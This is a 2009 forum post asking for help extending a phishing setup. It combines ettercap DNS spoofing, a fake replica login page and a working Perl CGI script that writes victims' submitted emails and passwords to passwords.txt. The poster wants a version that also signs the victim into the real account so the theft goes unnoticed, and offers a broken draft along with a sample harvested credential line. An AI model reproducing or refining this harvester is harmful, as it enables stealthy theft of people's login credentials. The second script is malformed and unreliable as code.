Programming: A place for our community to discuss their own security related coding projects.
Okay, so I've set up air snarf in the lab. I'm using ettercap to spoof the DNS, and I have modified a fake replica page where the login action invokes the CGI script below; the login is saved and all works fine. My question is, instead of serving up the said CGI page with the example message "sorry our server is down for maintenance", how would we go about using the information from stdin to refer and log the victim into their account whilst still recording the data to passwords.txt? So instead of stealing the victim's login and printing a suspicious "sorry our servers are down" message, the victim's login should be stolen, but the victim should also be signed into his account, none the wiser of what just happened.

So a quick overview: the user presses login on the fake replica page, the cgi/html script is executed, his info is stored to passwords.txt, but he is also then logged in, without seeing any of this happen.

CURRENT CGI SCRIPT

```perl
#!perl
# chmod +x this file and stick it in your cgi-bin directory
# CHANGE THESE VARIABLES $page_title $page_message $page_image
$page_title = "BUSY SERVERS";
$page_message = "SORRY IT LOOKS LIKE OUR SERVERS ARE BUSY TRY LATER";
$page_image = "SERVER.jpg";
print "Content-type:text/html\n\n";
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
    ($name, $value) = split(/=/, $pair);
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    $FORM{$name} = $value;
}
$file = "/passwords.txt";
open (MAIL, ">>$file") or dienice("Can't access $file!\n");
print MAIL "\nurl = $ENV{'SERVER_NAME'}";
foreach $key (keys(%FORM)) {
    print MAIL ", $key = $FORM{$key}";
}
close(MAIL);
# return HTML message to user
print "<html><head><title>$page_title</title></head><body>";
print "<center>";
print "<img src=\"/$page_image\"><br><br>";
print "$page_message<br><br>\n";
print "</body></html>";
```

Here is an example of what password.txt looks like:

```
url = Backtrack Railway Services, form_charset = UTF-8, login_params = , login_cmd = , submit.x = Log In, login_email = Backtrack@hotmail.com, login_password = backtrack1, target_page = 0
```

This is what the script needs to be, something like the following (excuse this pathetic attempt):

```perl
#!perl
# chmod +x this file and stick it in your cgi-bin directory
print "Content-type:text/html\n\n";
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
    ($name, $value) = split(/=/, $pair);
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    $FORM{$name} = $value;
}
$file = "/passwords.txt";
open (MAIL, ">>$file") or dienice("Can't access $file!\n");
print MAIL "\nurl = $ENV{'SERVER_NAME'}";
foreach $key (keys(%FORM)) {
    print MAIL ", $key = $FORM{$key}";
}
close(MAIL);
# return HTML message to user
<html>
<body>
<form method="post" action="not for forum">
<input type="hidden" name="page" value="$page">
username: <input type="text" name="login_email" value="$key" size=10><br>
password: <input type="password" name="login_password" value="$FORM" size=10><p>
<input type="submit" value="Log In">
</form>
</body>
</html>
```

Thanks in advance.
__________________
In spite of the cost of living, it's still popular.

Last edited by killadaninja; 10-30-2009 at 07:10 AM.